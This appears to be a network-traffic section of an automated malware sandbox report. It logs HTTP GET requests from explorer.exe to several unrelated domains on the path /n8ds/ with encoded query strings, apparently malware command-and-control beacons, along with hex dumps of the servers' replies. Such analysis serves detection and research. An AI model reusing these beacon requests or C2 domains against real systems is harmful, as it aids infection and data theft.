                                                                                                                                                    45192.168.11.2049860172.67.201.23280C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:12:35.517215014 CET8213OUTGET /n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&B85P=7nvHaF HTTP/1.1
                                                                                                                                                    Host: www.topwowshopping.store
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:12:35.698385954 CET8214INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:12:35 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    cache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0
                                                                                                                                                    expires: 0
                                                                                                                                                    last-modified: Mon, 29 Nov 2021 13:12:35 GMT
                                                                                                                                                    pragma: no-cache
                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vih0tsY4%2FyyqnkOqfOwNC6uGd%2FXb0bcfBv7j9zgq8DwIQJSkKhYl7xKGt1F24kkT10OiKghMq68juGm%2F2ZYMCNIMZtIM6Kqu5MB0yRAjy95aCUAIIHW2LXY1qmRy%2BNGkutk4mNHmPr6fSNw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 6b5c16a60bbd1f45-FRA
                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a
                                                                                                                                                    Data Ascii: d404 Not Found
                                                                                                                                                    Nov 29, 2021 14:12:35.698400021 CET8214INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    5192.168.11.2049815164.155.212.13980C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:07:16.667834997 CET6413OUTGET /n8ds/?lZOD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.ayudavida.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:07:17.304024935 CET6413INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:07:17 GMT
                                                                                                                                                    Content-Type: text/html; charset=gbk
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.6.40
                                                                                                                                                    Location: /404.html
                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    6192.168.11.204981635.244.144.19980C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:07:22.543446064 CET6414OUTGET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1
                                                                                                                                                    Host: www.gdav130.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:07:22.843972921 CET6415INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx/1.14.0
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:07:22 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 5379
                                                                                                                                                    Last-Modified: Fri, 30 Apr 2021 06:44:28 GMT
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    ETag: "608ba74c-1503"
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 32 35 2e 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c
                                                                                                                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.25.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,
                                                                                                                                                    Nov 29, 2021 14:07:22.844050884 CET6417INData Raw: 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 e8 84 9a e6 9c ac 2e 2e 2e 22 29 2c 77 69 6e 64 6f 77 2e 5f 68 6d 74 3d 77 69 6e 64 6f 77 2e 5f 68 6d 74 7c 7c 5b 5d 3b 63 6f 6e 73 74
                                                                                                                                                    Data Ascii: e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send(n){(new Image).src=n}function reportLoading(n){n=n|
                                                                                                                                                    Nov 29, 2021 14:07:22.844106913 CET6418INData Raw: 6c 61 63 65 28 2f 25 32 30 2f 67 2c 22 2b 22 29 2c 73 3d 22 22 2e 63 6f 6e 63 61 74 28 22 68 74 74 70 73 3a 2f 2f 74 72 61 63 6b 2e 75 63 2e 63 6e 2f 63 6f 6c 6c 65 63 74 22 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 22 29 2e 63 6f 6e 63
                                                                                                                                                    Data Ascii: lace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()||a())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android"
                                                                                                                                                    Nov 29, 2021 14:07:22.844146967 CET6418INData Raw: 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67 74 68 2c 69 3d 30 3b 69 3c 6c 65 6e 3b 69 2b 2b 29 7b 76 61 72 20 65 3d 71 73 4c 69 73 74 5b 69 5d
                                                                                                                                                    Data Ascii: rch||"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=t
                                                                                                                                                    Nov 29, 2021 14:07:22.857911110 CET6420INData Raw: 72 75 65 22 3d 3d 3d 65 29 7b 76 61 72 20 24 68 65 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 24 73 63 72 69 70 74 31 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65
                                                                                                                                                    Data Ascii: rue"===e){var $head=document.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute("crossorigin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js")
                                                                                                                                                    Nov 29, 2021 14:07:22.857976913 CET6420INData Raw: 76 20 63 6c 61 73 73 3d 22 6e 6f 2d 61 64 22 3e e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2
                                                                                                                                                    Data Ascii: v class="no-ad"></div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.cb2b0f54365b00b5316b.js"></script></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    7192.168.11.2049817216.172.172.8780C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:07:39.005892992 CET6421OUTGET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.dietatrintadias.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:07:39.161941051 CET6423INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:07:39 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                    Last-Modified: Tue, 23 Jul 2019 14:50:08 GMT
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 2361
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 39 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 3e
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120">
                                                                                                                                                    Nov 29, 2021 14:07:39.162003994 CET6424INData Raw: 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 35 32 2e 70 6e 67 22
                                                                                                                                                    Data Ascii: <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    8192.168.11.204981888.99.22.580C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:07:44.205419064 CET6425OUTGET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1
                                                                                                                                                    Host: www.helpcloud.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:07:44.220025063 CET6425INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:07:44 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 178
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: https://www.helpcloud.xyz:443/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    9192.168.11.2049819172.120.157.18780C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:07:49.612411022 CET6426OUTGET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1
                                                                                                                                                    Host: www.stylesbykee.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:07:49.774852991 CET6427INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:07:45 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 801
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e b3 a4 c9 b3 ce cf b6 d9 bf c6 bc bc b9 c9 b7 dd d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e
